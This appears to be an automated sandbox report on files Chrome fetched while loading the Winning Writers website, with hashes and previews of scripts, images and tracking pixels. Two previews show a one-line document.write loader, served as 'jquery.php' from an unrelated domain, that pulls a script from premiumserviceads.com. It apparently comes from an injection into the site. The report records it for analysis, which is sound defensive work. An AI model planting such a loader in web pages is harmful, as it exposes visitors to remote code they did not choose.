                                                                                                                                                                                            Preview:/*!. * jQuery Cookie Plugin v1.4.0. * https://github.com/carhartl/jquery-cookie. *. * Copyright 2013 Klaus Hartl. * Released under the MIT license. */.(function (factory) {..if (typeof define === 'function' && define.amd) {...// AMD...define(['jquery'], factory);..} else if (typeof exports === 'object') {...// CommonJS...factory(require('jquery'));..} else {...// Browser globals...factory(jQuery);..}.}(function ($) {...var pluses = /\+/g;...function encode(s) {...return config.raw ? s : encodeURIComponent(s);..}...function decode(s) {...return config.raw ? s : decodeURIComponent(s);..}...function stringifyCookieValue(value) {...return encode(config.json ? JSON.stringify(value) : String(value));..}...function parseCookieValue(s) {...if (s.indexOf('"') === 0) {....// This is a quoted cookie as according to RFC2068, unescape.......s = s.slice(1, -1).replace(/\\"/g, '"').replace(/\\\\/g, '\\');...}....try {....// Replace server-side written pluses with spaces.....// If we can't decode the
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960102417&cv=11&fst=1731960102417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):84
                                                                                                                                                                                            Entropy (8bit):4.6202716617020805
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:yLRmcpZBLvYAxdzG2HvfHFDKOmMe:yL/pZtvndzGuvdWOmMe
                                                                                                                                                                                            MD5:81CB3CECEAD99C793291B798DA15358A
                                                                                                                                                                                            SHA1:7F8FD4FB22894A131282663D16BDC798422288E8
                                                                                                                                                                                            SHA-256:2F16E44FC57055E2BD8F05063088F10F7CDF89555908E02CF6241FBA0F4677CC
                                                                                                                                                                                            SHA-512:075E52450042A33A0E11F0A48EE734C216DB2F8108AB8DFA5082553BD7A62E8276739B3081D25D3DB30AEABB437DAA54BF5D793DF76288EF9982AF18C8E1C829
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:document.write('<script src="https://premiumserviceads.com/yJuiD" defer></script>');
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2754)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2779
                                                                                                                                                                                            Entropy (8bit):4.931845880014072
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:xLnN+tyKOxwaPYuxwFAmKldNzr1JhxPE63haDJ77LMeHrc76cCgX:hTPCoEtE
                                                                                                                                                                                            MD5:70F841EEEC9B5D0DD90BDC833CC820A5
                                                                                                                                                                                            SHA1:8E746DE81C895AB112B178510A74001FAC46487F
                                                                                                                                                                                            SHA-256:DD6A94BFD6C29C2BD0D00C907B075E7F034A0328D68DE2B00284A656C1A95D67
                                                                                                                                                                                            SHA-512:BF6F4827EF92E503388B0FAF6D0681E82FE74EFFD8762C978A5DB6BC4D3F45DBA9411CD891C7E0942D7B6EA7EEF72DB3EFD9FC080EB507743DEA7E3F229C68F5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! device.js 0.1.58 */.(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},device.fxos=function(){return(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 118 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3147
                                                                                                                                                                                            Entropy (8bit):7.92208098001136
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:GFwE2m5Cdlm8hp47zIRYVkGIg5wQLrZD8+midGjzqfSDylBdthF0AlTOG:YwRgGl7icRYVk6wQHZ44t6OhF0NG
                                                                                                                                                                                            MD5:0732149C7F9BFCC0C32AB5005D5D5381
                                                                                                                                                                                            SHA1:9568581474715305C161A489DA2AE6F7AE77B931
                                                                                                                                                                                            SHA-256:78A94B3A3CFD0101DA72E3D20BD49503C2E2116383EDAE5C9443C2EEA255EA59
                                                                                                                                                                                            SHA-512:C1A6DF5E32D3222B3D982F9791426FC851AD8CC04E180C2423B1FB98ED160A41DED089CF3D64F6A046B4BA03CAEDE2101AD4A453B78EA8EA8D772A147D649152
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...v..........ShK....sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.Z{pT......<@..cH.A.e@..G..$............h.v.j[....?t:.j....T.!.*..h#$...+...:.@.g.b.}...w...&........{.w.=.|.;.{....... 5)).@.9M.,$A7..T....TO.h.;.u.....+....g..."..4!.P.MA.z.O..z)E...k.z.+..3f...2...4...j....z..~.......(**..p..|o6..=....>\......f.hm]].i.. .*.].]...$.,....I...x...~......s.....|..^..!.?.a....f..\.......GA%.g.L.j....h....@.'..%...i.-..q...7....>@.j..8.......qB.].a>PU../.9/...d..JL.|.....j....].z.....G.eqc.......x...J.J..f..w5+.`.>..q...!..WlYY.H..w..wZ.D!..BVTU........p.).zt.j.J...\).*++..zB./.OK.IZ..... ..T.].w.......R........6(w:..SM.P\.fn.. ..~..W.D3..^.....2......c.B..U*..`...zx......G...!..,[.6.v....);+.&L.@O?....L.O..)...Nt..W..x......"......v...KI_.......sZ...i$...1......3...;.T..0:....G..<.....^...,.r....._.j..&..3H....U...2(Y.D...!....p:....G..C.....q.>u....9Z=.mp[.......u%.)e. .......["V.Q..N....T$.........>...tjp.0..9..(p..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.821894633145409
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUke5NawytU7I:1DY0h8Rx47OIqWbZJe5NawyR
                                                                                                                                                                                            MD5:2BD01E06679F7BBB9995B030C4D58E67
                                                                                                                                                                                            SHA1:C5BE5D43F873F1E50D9312EEDA0858972F88789B
                                                                                                                                                                                            SHA-256:9EEFE41A1E9FC572678F9605945FA65274398CD431D1BD1C2B083E24818C64D7
                                                                                                                                                                                            SHA-512:6A4352509969AC9A46D4D2851B364B65F91E728053BA16C20197FEC778BEE9C049AFDF7ACDE81DFF1DA01A729F512C296F5B1927D97B4B89B16A4FC984ED93AC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):84
                                                                                                                                                                                            Entropy (8bit):4.6202716617020805
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:yLRmcpZBLvYAxdzG2HvfHFDKOmMe:yL/pZtvndzGuvdWOmMe
                                                                                                                                                                                            MD5:81CB3CECEAD99C793291B798DA15358A
                                                                                                                                                                                            SHA1:7F8FD4FB22894A131282663D16BDC798422288E8
                                                                                                                                                                                            SHA-256:2F16E44FC57055E2BD8F05063088F10F7CDF89555908E02CF6241FBA0F4677CC
                                                                                                                                                                                            SHA-512:075E52450042A33A0E11F0A48EE734C216DB2F8108AB8DFA5082553BD7A62E8276739B3081D25D3DB30AEABB437DAA54BF5D793DF76288EF9982AF18C8E1C829
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://cta.berlmember.com/google/jquery.php
                                                                                                                                                                                            Preview:document.write('<script src="https://premiumserviceads.com/yJuiD" defer></script>');
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):291880
                                                                                                                                                                                            Entropy (8bit):5.56295907320891
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:npJI6PFDXBd+Yw+0uVH54P7o7U4RPzToDV77yTQeRIB7mP90J0PO:pNDXB0YFPfIeRIB7mP9Q
                                                                                                                                                                                            MD5:2D03AD3340A3079FF8C1040747157A73
                                                                                                                                                                                            SHA1:6538322DFAC93C783CCA09DEF147E78682D7F8E3
                                                                                                                                                                                            SHA-256:0F64DB2AEBAE22E138A6F099EE98EAF0FE61AF918A0C83349F4CCE90665E8E5F
                                                                                                                                                                                            SHA-512:60CECB4D397F4D8DE4ED375E46E07DA3B151893FFED0B2B0E2848B7141B55471C8B5E22EA7F8A2AE1E72CAAA37072966748A95C3B87BA11ECF4B699304AB2AD5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-1072733940","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_reg
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):127513
                                                                                                                                                                                            Entropy (8bit):7.94674769468261
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:/y2jQElUb9hSJ3X6vmDOxwKqYy3nxtp1QRwZSVx6mmLp+:/y2jxwvmD4s3nxtp6RwwWN+
                                                                                                                                                                                            MD5:F8CD0839B17931931D9AC82F601AB60F
                                                                                                                                                                                            SHA1:67E118F6546C58B9F405E0FCFBB55CA1ACE4C1D9
                                                                                                                                                                                            SHA-256:88C614111612F40FD8D4078494E81A1344AE72FDA5F833644ED5EDCC3841F1F9
                                                                                                                                                                                            SHA-512:DE3753C4AAE9402D8EF53576B594CF8EA642D0A5C440F9E8843CC70A96F61CAC912BEDC586B34CCABFA51D8CD39A8AE4D8029DCFF4B4AC057BB1120406870955
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/tomstory/mcnamara_home_page_slide.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:E9B5A97E828611EF9F3CBEB41D1C8283" xmpMM:InstanceID="xmp.iid:E9B5A97D828611EF9F3CBEB41D1C8283" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:06cd94cf-5868-4632-86dc-94be07c287df" stRef:documentID="adobe:docid:photoshop:8684a329-6d2f-de46-8d94-3eb9001aee06"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2754)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2779
                                                                                                                                                                                            Entropy (8bit):4.931845880014072
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:xLnN+tyKOxwaPYuxwFAmKldNzr1JhxPE63haDJ77LMeHrc76cCgX:hTPCoEtE
                                                                                                                                                                                            MD5:70F841EEEC9B5D0DD90BDC833CC820A5
                                                                                                                                                                                            SHA1:8E746DE81C895AB112B178510A74001FAC46487F
                                                                                                                                                                                            SHA-256:DD6A94BFD6C29C2BD0D00C907B075E7F034A0328D68DE2B00284A656C1A95D67
                                                                                                                                                                                            SHA-512:BF6F4827EF92E503388B0FAF6D0681E82FE74EFFD8762C978A5DB6BC4D3F45DBA9411CD891C7E0942D7B6EA7EEF72DB3EFD9FC080EB507743DEA7E3F229C68F5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/device.min.js
                                                                                                                                                                                            Preview:/*! device.js 0.1.58 */.(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},device.fxos=function(){return(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4941
                                                                                                                                                                                            Entropy (8bit):5.815223577717856
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUZe2etU79m:1DY0h8Rx47OIqWbZEe2egm
                                                                                                                                                                                            MD5:4052E114D1841945339BE7BB0947EEE0
                                                                                                                                                                                            SHA1:8BB4BDBC63504435C8D3142E04CE9A1E65E46591
                                                                                                                                                                                            SHA-256:91841646B25B2EB71E4466D4229D6E52B73F9E2E179EDCA3BD9E79A7DC285918
                                                                                                                                                                                            SHA-512:AAA5D138BB4FD4C1AC61499B3287A6769D32E3D6AEB00BB2739090C454273CD596281546E75EDBC97B5EB5281E0948BE59B98936DA0B38051919DDC39B2EC9E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960054416&cv=11&fst=1731960054416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 10 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1003
                                                                                                                                                                                            Entropy (8bit):5.8550025694771035
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:Z1he91Wwh82lYSKwKAUymVtbJT3ouyJ3V2K3GTVRv:nqQvnLomDJIJ3Narv
                                                                                                                                                                                            MD5:77AEAA52715B898B73C74D68C630330E
                                                                                                                                                                                            SHA1:B3A4EE645BA494F52840EF8412015BA0F465DBE0
                                                                                                                                                                                            SHA-256:A163BAB86035B0BA62C98FBBD4D8B4F5EDABBBB774ECA0B5E9E5081B5711B2AB
                                                                                                                                                                                            SHA-512:84C18F1AF90BA848B2888754E20A28487C556B9A1275DC1371E0D0964D3803FBFE79A294188C37B22331D88C6DE5363E5EDE3FC254879721540959AEB712391C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR..............2.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E" xmpMM:DocumentID="xmp.did:FDE98EBC032611E29899DC09CE2C174E" xmpMM:InstanceID="xmp.iid:FDE98EBB032611E29899DC09CE2C174E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1C8483B9CE3E1118185EC97ECB4D81E" stRef:documentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.v......IDATx.b.....@.`b ..*..B....h...._......IEND.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):48241
                                                                                                                                                                                            Entropy (8bit):4.809295656103982
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:aJXgUx6gl2XxYJrZXeZ4S/mJkDswo9eD5QzwenDEg6BDmphmQgDlOc0qd4ftYbQ6:aJt+SpqmC7iMRDfzwxM23msH5sI14
                                                                                                                                                                                            MD5:668F6EADEC2D0BCCD58C631BE873E06F
                                                                                                                                                                                            SHA1:73F3C6A5A1B837283B109D7F60CDA8B1F6692284
                                                                                                                                                                                            SHA-256:F6A760CC27A3BD6171BE0FB10F3C04E2FE2D13B24B11B7469D045A0A3A80240B
                                                                                                                                                                                            SHA-512:0EB58E536B9417CA84AE5CCCB5ABD896955486AE5060DA5A621A74AAFDEA407D147947D0366A03A083A21F7657C7569CAEA87D4E7D60677B5A86A54124A28239
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Preview:@import url(//fonts.googleapis.com/css?family=Raleway:wght@400;700|Lora:400,700,400italic,700italic&display=swap);.a,.abbr,.acronym,.address,.applet,.article,.aside,.audio,.b,.big,.blockquote,.body,.canvas,.caption,.center,.cite,.code,.dd,.del,.details,.dfn,.div,.dl,.dt,.em,.embed,.fieldset,.figcaption,.figure,.footer,.form,.h1,.h2,.h3,.h4,.h5,.h6,.header,.hgroup,.html,.i,.iframe,.img,.ins,.kbd,.label,.legend,.li,.mark,.menu,.nav,.object,.ol,.output,.p,.pre,.q,.ruby,.s,.samp,.section,.small,.span,.strike,.strong,.sub,.summary,.sup,.table,.tbody,.td,.tfoot,.th,.thead,.time,.tr,.tt,.u,.ul,.var,.video {. margin: 0;. padding: 0;. border: 0;. font-size: 100%;. font: inherit;. vertical-align: baseline.}..article,.aside,.details,.figcaption,.figure,.footer,.header,.hgroup,.menu,.nav,.section {. display: block.}.body,html{height: 100%}.body {. line-height: 1.}..ol,.ul {. list-style: none.}..blockquote,.q {. quotes: none.}..blockquote:after,.blockquote:before,.q:af
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.819050741630442
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUce/awytU7nDu:1DY0h8Rx47OIqWbZ5e/awyqu
                                                                                                                                                                                            MD5:A579E374F79B2A42829EC4F231D354D7
                                                                                                                                                                                            SHA1:EE24558C840BB9D966C631686DA9AAA6B99A4C85
                                                                                                                                                                                            SHA-256:84A30327BD8B1D48C4E93DE07513214B1D0148A7858A950224829DE1E2D4BEE8
                                                                                                                                                                                            SHA-512:00F8F25A6BE2EB9EB8601FED8C8A99DFC6B50798F87ED9620D7B31817F577C0E243C4BAE06E4C5576DC40E4E9CFD7BBFFEDCD9F928A70B92EFD1CEBA32859A4C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
